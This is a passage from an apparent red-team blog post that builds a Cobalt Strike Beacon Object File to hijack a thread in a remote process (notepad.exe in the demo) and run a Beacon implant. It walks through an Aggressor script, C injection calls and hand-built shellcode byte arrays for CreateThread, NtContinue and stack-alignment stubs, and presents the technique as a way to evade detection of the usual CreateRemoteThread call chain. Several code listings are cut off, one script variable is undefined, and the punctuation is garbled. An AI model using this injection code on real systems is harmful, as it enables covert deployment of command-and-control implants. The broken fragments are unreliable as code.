  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a β€œreturn”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread will run the DllMain function until the operator exits the Beacon, since the stageless raw Beacon artifact does not perform a β€œreturn”. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run. Essentially, this is one of three components our β€œnew” full payload will β€œcarry”, so when execution reaches the remote process, the call to CreaeteThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant, it will actually execute a small shellcode, made up of three components, that places the Beacon implant into its own local thread, along with a two other routines that will be described here shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component’s purpose.
  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large β€œfinal payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these β€œmoving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated to point the DWORD.Rip member, which represents the value of the 64-bit instruction pointer, to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.

Before moving on, there are two things I would like to call out. The first is the call to CreateThread. At first glance, this may seem like it is not a viable alternative to CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process, it is created locally. This does a few things, including avoiding the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread and secondly, by blending in (a bit more) by calling CreateThread, which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with come code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially β€œthis function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to β€œpeek” the prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to our function prototypes, as the prototypes of most Windows API functions contain a #define directive with a definition of WINBASEAPI, or similar, which already contains a __declspec(dllimport) keyword. An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:


The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses from, like functions other libraries or object files, will point to the prototyped LIB$Function functions memory address. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as a code to be executed. Not reinventing the wheel here, Raphael outlines this all in his wonderful video.

In addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, that are outlined in the beacon.h header file, supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output over Beacon. This API accepts a user-supplied string, as well as #define directive in beacon.h, namely CALLBACK_OUTPUT and CALLBACK_ERROR. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Alias for Beacon ID and args
    local('$bid $listener $pid $payload');
    # Set the number of arguments
    ($bid, $pid, $listener) = @_;

    # Determine the amount of arguments
    if (size(@_) != 3)
        berror($bid, "Error! Please enter a valid listener and PID");

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
        berror($bid, "Please enter a valid PID!\n");

    # Generate a new payload 
    $payload = payload_local($bid, $listener, "x64", "thread");
    $handle1 = openf(">out.bin");
    writeb($handle1, $data1);
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);

The goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack, a PID for injection and the name of the Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, listener name, the PID, and payload, which will be generated later. The @_ statement sets an array with the order our arguments will be supplied to the BOF, mean the command to use this BOF would be cThreadHijack "Name of listener" PID. After, error checking is done to determine if 3 arguments have been supplied (two for the PID and listener and the Beacon ID, the third argument, will be supplied to the BOF without us needing to input anything). After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer and the newly created $payload variable is packed as a binary value. Then, upon execution in Cobalt Strike, the alias cThreadHijacked is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that details on adhering to BOF’s rules while writing C is out of the way, let’s get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that utilize this handle, VirtualAllocEx and WriteProcessMemory, must have a total access right of PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and β€œbreaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId

As mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address space of the calling function. Since we will be injecting this routine into the remote process, when the routine executed, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a local thread - but since the routine will be executed inside of the remote process, it will spawn a local thread, instead of requiring us to create a thread, remotely, from our current process.

The function argument we will be worried about is LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let’s get into the development of the routine.

The first step is to declare a BYTE array of 64-bytes. 64-bytes was chosen, as it is divisible by a QWORD, which is a 64-bit address. This is to ensure proper alignment, meaning 8 QWORDS will be used for this routine - which keeps everything nice and aligned. Additionally, we will declare an integer variable to use as a β€œcounter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { NULL };
int z = 0;

Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires the first four integer arguments (floating-point values are passed in different registers) are passed in the RCX, RDX, R8, and R9 registers, respectively. However, the question remains - CreateThread has a total of six parameters, what do we do with the last two? With __fastcall, the fifth and subsequent parameters are located on the stack at an offset of 0x20 and every 0x8 bytes subsequently. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which informs the thread we would like to thread to run immediately after it is created. This will kick off our Beacon implant, after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this will not return a thread ID to the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been dynamically filled with the thread ID. However, this is not important for purpose of this post.

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This performs bitwise XOR with the same two values (RCX), which results in 0 as bitwise XOR with two of the same values results in 0. The result is then placed in the RCX register. Synonymously, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;

The next step, is really the only parameter we need to specify a specific value for, which is lpStartAddress. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartParameter argument takes a data type of LPTHREAD_START_ROUTINE, which is pretty similar with LPVOID. However, for continuity sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link to us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure as the array is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE, as our shellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to find this function pointer, in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId will be located at an offset of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use to mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate we would like to overwrite what that value is pointing to.

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF denotations in our code.

// Resolve the address of CreateThread
unsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == NULL)
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be setup is as follows:

  1. A call to the stack alignment/CreateThread routine will be made firstly (the stack alignment routine will be hit on in a latter portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, it will push a return address onto the stack. This return address will actually be the address of the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when executed is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

In accordance with out plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;

Let’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

β€œNever in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue”

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution

This is great, and we are almost home free. The issue remains, however, the topic of thread restoration. After all, we are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode, however, it will also present some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will cause the the process housing this thread, the desired remote process we are injecting into, to most likely crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set if the Alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

As you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because of the fact each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

Synonymous with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { NULL };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration, and that is we need to also carry the preserved CONTEXT record with us, for use, in the NtContinue call. To do this, we will use a near call procedure. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions can be used to call a function, relative to the address in the instruction pointer. Essentially, if we can calculate the distance, in a DWORD, to the CreateThread routine, we can just invoke the opcode 0xe8, along with a DWORD to represent the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is because the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual address (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will β€œjump over” the NtContinue code and the CONTEXT record, in order to first execute the CreatThread routine. The corresponding instructions we need, are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said about, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because, the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call instruction itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for, by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actual offset itself, aDWORD, which is a 4 byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to let it know how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a β€œhacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a very documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate byte after the call instruction.

// Near call instruction to call the address directly after, which is used to pop the pushed return address onto the stack with a RVA from the same page (call pushes return address onto the stack)
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this, is the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of this function. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close the the CONTEXT record, which will be located directly after the call to NtContinue.

Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64-bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now however, if we add 64-bytes, however, to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record, than we where when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcodes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction and the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The mov rax instruction set is first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
unsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. If NtContinue cannot be resolved, abort
if (ntcontinueAddress == NULL)
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue.\n", KERNEL32$GetLastError());

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;

All there is left now is the stack alignment routine inside of the call to CreateThread! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers aschar* data types. However, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED, which indicates pretty much any data type can be used, which is perfect for us as CONTEXT is a structure, not a char*.

The above code creates a buffer with the size of our routines, and copies it into the routine at the correct offsets, with the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.

First, VirtualAllocEx is called again.

// Inject the shellcode into the target process with read/write permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(

if (allocateMemory == NULL)
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(

if (!writeMemory)
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%llx\n", KERNEL32$GetLastError());

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer and upon thread restoration, the value in RIP will be executed.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

Notice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this feature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!


// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(

// Error handling
if (!setRip)
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());


// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(


// Free the buffer used for the whole payload

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are β€œsensitive”.

// Close handle
// Close handle

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

